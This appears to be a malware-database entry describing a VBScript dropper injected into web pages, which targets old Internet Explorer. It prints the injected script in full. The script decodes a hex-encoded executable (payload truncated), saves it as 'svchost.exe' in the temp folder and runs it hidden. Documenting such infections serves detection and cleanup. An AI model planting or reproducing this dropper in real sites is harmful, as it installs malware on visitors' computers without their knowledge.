Description:
Malicious VBScript that drops a malicious file to a site visitor's computer and [optionally] executes it.
Such attacks work only in old versions of Internet Explorer. Most modern browsers don't support VBScript by default.
Here's a sample of what used to be one of the most popular VB dropper injection
<SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004...skipped...000000000000000" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--></SCRIPT>
Affecting: Any web site (no specific target).